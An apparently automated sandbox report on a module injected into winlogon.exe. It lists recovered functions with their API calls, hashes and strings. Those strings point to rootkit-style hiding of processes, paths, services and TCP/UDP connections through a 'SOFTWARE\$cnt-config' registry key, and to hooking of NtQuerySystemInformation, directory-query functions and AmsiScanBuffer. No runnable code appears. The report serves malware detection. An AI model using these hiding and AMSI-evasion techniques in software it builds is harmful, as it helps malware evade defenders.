lstrlenW.KERNEL32 ref: 000001CA7D213214

Strings

ntdll.dll, xrefs: 000001CA7D21308D
NtQueryObject, xrefs: 000001CA7D21309F
\Device\Nsi, xrefs: 000001CA7D2130DF

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: c99db775f95ad49f63960b31de7368144e072af91cd50a58f6ca275a580b9347
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 26B16F33A5479882FB669F25D400BD9B3A6FB44B98F94901AEE0953794DA37CD42C3C3

Function 000001CA7D2184B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001CA7D2184CC
RtlCaptureContext.NTDLL ref: 000001CA7D2184F9
RtlLookupFunctionEntry.NTDLL ref: 000001CA7D218513
RtlVirtualUnwind.NTDLL ref: 000001CA7D218554
IsDebuggerPresent.KERNEL32 ref: 000001CA7D2185A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001CA7D2185C5
UnhandledExceptionFilter.KERNEL32 ref: 000001CA7D2185D0

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: b08fb8c50f464ed379093d9854270921c734b56c222001deaac93b1b99a5f4bc
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 65319273604B8496FB618F60E880BED7370FB84758F84812ADA4E47B94DF39C649C796

Function 000001CA7D21CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001CA7D21CE0B
RtlLookupFunctionEntry.NTDLL ref: 000001CA7D21CE23
RtlVirtualUnwind.NTDLL ref: 000001CA7D21CE5E
IsDebuggerPresent.KERNEL32 ref: 000001CA7D21CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001CA7D21CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001CA7D21CEAC

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: e21dcb0928847e0ad1ab47b3b2793bd05313454e03d703009cfb91f4e3bedbc5
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: FD41C537614F8486E761CF24E8407DE73A4FB88758F904119EA9D47B94DF39C146CB82

Function 000001CA7D21DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001CA7D21DB99
FindNextFileW.KERNEL32 ref: 000001CA7D21DCCF
FindClose.KERNEL32 ref: 000001CA7D21DD0F
FindClose.KERNEL32 ref: 000001CA7D21DD3B

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 45d124b7b65d76756e98c7d09d685b6f4212555c67c952a88febd89221c6fea2
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 1AA1E633B4478889FB22DB759440BED7BA0BB8179CF9881199E5527A95CA3BC043C7C3

Function 000001CA7D1EDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001CA7D1EDB99
FindNextFileW.KERNEL32 ref: 000001CA7D1EDCCF
FindClose.KERNEL32 ref: 000001CA7D1EDD0F
FindClose.KERNEL32 ref: 000001CA7D1EDD3B

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: bca9c8bf826c505011b38fd6b5f6bfe9104125b42424f6945c05f756906d2787
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: C8A10633B4478849FB229B75E440BED7BA0BB81B9DF9C4115DA492BA95DA36C041C343

Function 000001CA7D211724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D21172F
HeapAlloc.KERNEL32 ref: 000001CA7D21173E

Part of subcall function 000001CA7D211264: GetProcessHeap.KERNEL32 ref: 000001CA7D21126A
Part of subcall function 000001CA7D211264: HeapAlloc.KERNEL32 ref: 000001CA7D211279
Part of subcall function 000001CA7D211264: GetProcessHeap.KERNEL32 ref: 000001CA7D211293
Part of subcall function 000001CA7D211264: HeapAlloc.KERNEL32 ref: 000001CA7D2112A4

Part of subcall function 000001CA7D211000: GetProcessHeap.KERNEL32 ref: 000001CA7D211006
Part of subcall function 000001CA7D211000: HeapAlloc.KERNEL32 ref: 000001CA7D211015
Part of subcall function 000001CA7D211000: GetProcessHeap.KERNEL32 ref: 000001CA7D211028
Part of subcall function 000001CA7D211000: HeapAlloc.KERNEL32 ref: 000001CA7D211037

RegOpenKeyExW.ADVAPI32 ref: 000001CA7D2117AE
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D2117DB
RegCloseKey.ADVAPI32 ref: 000001CA7D2117F5
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D211815
RegCloseKey.ADVAPI32 ref: 000001CA7D211830
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D211850
RegCloseKey.ADVAPI32 ref: 000001CA7D21186B
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D21188B
RegCloseKey.ADVAPI32 ref: 000001CA7D2118A6
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D2118C6
RegCloseKey.ADVAPI32 ref: 000001CA7D2118E1
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D211901
RegCloseKey.ADVAPI32 ref: 000001CA7D21191C
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D21193C
RegCloseKey.ADVAPI32 ref: 000001CA7D211957
RegOpenKeyExW.ADVAPI32 ref: 000001CA7D211977
RegCloseKey.ADVAPI32 ref: 000001CA7D211992
RegCloseKey.ADVAPI32 ref: 000001CA7D21199C

Part of subcall function 000001CA7D2112B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D211315
Part of subcall function 000001CA7D2112B8: GetProcessHeap.KERNEL32 ref: 000001CA7D211323
Part of subcall function 000001CA7D2112B8: HeapAlloc.KERNEL32 ref: 000001CA7D211334
Part of subcall function 000001CA7D2112B8: RegEnumValueW.ADVAPI32 ref: 000001CA7D211393
Part of subcall function 000001CA7D2112B8: GetProcessHeap.KERNEL32 ref: 000001CA7D2113DB
Part of subcall function 000001CA7D2112B8: HeapAlloc.KERNEL32 ref: 000001CA7D2113E9
Part of subcall function 000001CA7D2112B8: GetProcessHeap.KERNEL32 ref: 000001CA7D211406
Part of subcall function 000001CA7D2112B8: HeapFree.KERNEL32 ref: 000001CA7D211414
Part of subcall function 000001CA7D2112B8: lstrlenW.KERNEL32 ref: 000001CA7D21141D
Part of subcall function 000001CA7D2112B8: GetProcessHeap.KERNEL32 ref: 000001CA7D21142B
Part of subcall function 000001CA7D2112B8: HeapAlloc.KERNEL32 ref: 000001CA7D211439

Strings

process_names, xrefs: 000001CA7D211849
pid, xrefs: 000001CA7D21180E
service_names, xrefs: 000001CA7D2118BF
SOFTWARE\$cnt-config, xrefs: 000001CA7D21178E
tcp_local, xrefs: 000001CA7D2118FA
udp, xrefs: 000001CA7D211970
startup, xrefs: 000001CA7D2117D1
paths, xrefs: 000001CA7D211884
tcp_remote, xrefs: 000001CA7D211935

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-2609720707
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 2c83494e5a43262cfe800e831b7ec8651a9dabb613aca94f4580080f8d60cd14
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: CD711737B50B1985FB229F21E850AD833A4FF88B8CF819115ED4D47A28DE3AC546C3C6

Function 000001CA7D211E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001CA7D211E7F

Part of subcall function 000001CA7D2122A8: GetModuleHandleA.KERNEL32(?,?,?,000001CA7D211EB1), ref: 000001CA7D2122C0
Part of subcall function 000001CA7D2122A8: GetProcAddress.KERNEL32(?,?,?,000001CA7D211EB1), ref: 000001CA7D2122D1

CreateThread.KERNEL32 ref: 000001CA7D212043
TlsAlloc.KERNEL32 ref: 000001CA7D212049
TlsAlloc.KERNEL32 ref: 000001CA7D212055
TlsAlloc.KERNEL32 ref: 000001CA7D212061
TlsAlloc.KERNEL32 ref: 000001CA7D21206D
TlsAlloc.KERNEL32 ref: 000001CA7D212079
TlsAlloc.KERNEL32 ref: 000001CA7D212085

Strings

EnumServiceGroupW, xrefs: 000001CA7D211F50
PdhGetRawCounterArrayW, xrefs: 000001CA7D211FD0
NtResumeThread, xrefs: 000001CA7D211EC2
PdhGetFormattedCounterArrayW, xrefs: 000001CA7D211FF1
EnumServicesStatusExW, xrefs: 000001CA7D211F71, 000001CA7D211F92
NtDeviceIoControlFile, xrefs: 000001CA7D211FB6
AmsiScanBuffer, xrefs: 000001CA7D212012
pdh.dll, xrefs: 000001CA7D211FD7, 000001CA7D211FF8
amsi.dll, xrefs: 000001CA7D212019
ntdll.dll, xrefs: 000001CA7D211E8D
NtQueryDirectoryFileEx, xrefs: 000001CA7D211EFC
NtEnumerateValueKey, xrefs: 000001CA7D211F36
advapi32.dll, xrefs: 000001CA7D211F57, 000001CA7D211F78
NtEnumerateKey, xrefs: 000001CA7D211F19
NtQuerySystemInformation, xrefs: 000001CA7D211EA5
sechost.dll, xrefs: 000001CA7D211F99
NtQueryDirectoryFile, xrefs: 000001CA7D211EDF

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: c27b5b2766e8a714269c9b7251a9534395d3fbc0594a058b2d3d4c984f6c3e2e
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 47517A72A90B0EA5FB039B68E842ED83324BF4475CFC18916A40902575DE7BD25BC3E7

Function 000001CA7D2112B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D211315
GetProcessHeap.KERNEL32 ref: 000001CA7D211323
HeapAlloc.KERNEL32 ref: 000001CA7D211334
RegEnumValueW.ADVAPI32 ref: 000001CA7D211393

Part of subcall function 000001CA7D211530: StrCmpIW.SHLWAPI ref: 000001CA7D211561

GetProcessHeap.KERNEL32 ref: 000001CA7D2113DB
HeapAlloc.KERNEL32 ref: 000001CA7D2113E9
GetProcessHeap.KERNEL32 ref: 000001CA7D211406
HeapFree.KERNEL32 ref: 000001CA7D211414
lstrlenW.KERNEL32 ref: 000001CA7D21141D
GetProcessHeap.KERNEL32 ref: 000001CA7D21142B
HeapAlloc.KERNEL32 ref: 000001CA7D211439
StrCpyW.SHLWAPI ref: 000001CA7D21145B
GetProcessHeap.KERNEL32 ref: 000001CA7D211472
HeapFree.KERNEL32 ref: 000001CA7D211480

Strings

d, xrefs: 000001CA7D211356

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 10435c65013aa49502dc7abc10a9fb8f475a20879a614cbceb8abb604b999947
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: E5516033A50B8896F722CF62E44979A77A1FB88F98F858124DE4907718DF3DD046C782

Function 000001CA7D21EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001CA7D21F34A,?,?,00000000,000001CA7D21F2CD), ref: 000001CA7D21EFF5
GetLastError.KERNEL32(?,?,00000000,000001CA7D21F2CD), ref: 000001CA7D21F007
LoadLibraryExW.KERNEL32(?,?,00000000,000001CA7D21F2CD), ref: 000001CA7D21F049
VirtualProtect.KERNEL32 ref: 000001CA7D21F0A5
VirtualProtect.KERNEL32 ref: 000001CA7D21F0D6
FreeLibrary.KERNEL32(?,?,00000000,000001CA7D21F2CD), ref: 000001CA7D21F11A
GetProcAddress.KERNEL32(?,?,00000000,000001CA7D21F2CD), ref: 000001CA7D21F126

Strings

ext-ms-, xrefs: 000001CA7D21F02E
AppPolicyGetProcessTerminationMethod, xrefs: 000001CA7D21F157, 000001CA7D21F165
api-ms-, xrefs: 000001CA7D21F01B

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 841100cd2b18d10c7530346504741f059c760433718e5c958d51dca8c66ea59f
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 79518F33B4170851FA169B56A800BE57250BF48BB8FD88729AE3D073D4DF3AD54686C7

Function 000001CA7D2133A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001CA7D2133FD
GetProcessHeap.KERNEL32 ref: 000001CA7D213412
HeapAlloc.KERNEL32 ref: 000001CA7D213420
PdhGetCounterInfoW.PDH ref: 000001CA7D213436
StrCmpW.SHLWAPI ref: 000001CA7D21344B

Part of subcall function 000001CA7D213950: StrCmpNW.SHLWAPI ref: 000001CA7D213972
Part of subcall function 000001CA7D213950: StrStrW.SHLWAPI ref: 000001CA7D213990
Part of subcall function 000001CA7D213950: StrToIntW.SHLWAPI ref: 000001CA7D2139B7

GetProcessHeap.KERNEL32 ref: 000001CA7D213488
HeapFree.KERNEL32 ref: 000001CA7D213496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001CA7D213444

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 752b222f9f1cd9264d68c2c53bbe3c21249311e990f53d32d649b7497d1e9cf2
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 1A31E933E44B5896F722CF12A404B99B391FB88B98FC48528AD4843624DF3AD44383C6

Function 000001CA7D2134B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001CA7D213516
GetProcessHeap.KERNEL32 ref: 000001CA7D213527
HeapAlloc.KERNEL32 ref: 000001CA7D213535
PdhGetCounterInfoW.PDH ref: 000001CA7D21354B
StrCmpW.SHLWAPI ref: 000001CA7D213560

Part of subcall function 000001CA7D213950: StrCmpNW.SHLWAPI ref: 000001CA7D213972
Part of subcall function 000001CA7D213950: StrStrW.SHLWAPI ref: 000001CA7D213990
Part of subcall function 000001CA7D213950: StrToIntW.SHLWAPI ref: 000001CA7D2139B7

GetProcessHeap.KERNEL32 ref: 000001CA7D21358D
HeapFree.KERNEL32 ref: 000001CA7D21359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001CA7D213559

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 01238701deea32749901f043c41a85233535f38141b80a811341c7053083115b
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 9D31B433A44B4996F712DF12A444B9973A1BF88F98F858129DE4A43724DF3AE44782C3

Function 000001CA7D21A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001CA7D21A289

Part of subcall function 000001CA7D21B144: __GetUnwindTryBlock.LIBCMT ref: 000001CA7D21B187
Part of subcall function 000001CA7D21B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001CA7D21B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001CA7D21A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001CA7D21A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001CA7D21A6BC

Strings

csm, xrefs: 000001CA7D21A30A
csm, xrefs: 000001CA7D21A2A3
csm, xrefs: 000001CA7D21A384

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 93558ce561f458a496548046fa9771a477e4b847544d87466bd0439cd31ff69d
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: B2D1AC33A447888AFB62CB659540BDD77A0FB4578CF908119EA8957B96CB36C482C7C3

Function 000001CA7D1B962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001CA7D1B9689

Part of subcall function 000001CA7D1BA544: __GetUnwindTryBlock.LIBCMT ref: 000001CA7D1BA587
Part of subcall function 000001CA7D1BA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001CA7D1BA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001CA7D1B9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001CA7D1B99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001CA7D1B9ABC

Strings

csm, xrefs: 000001CA7D1B9784
csm, xrefs: 000001CA7D1B970A
csm, xrefs: 000001CA7D1B96A3

Memory Dump Source

Source File: 00000026.00000003.1759332183.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_1ca7d1b0000_winlogon.jbxd

Similarity

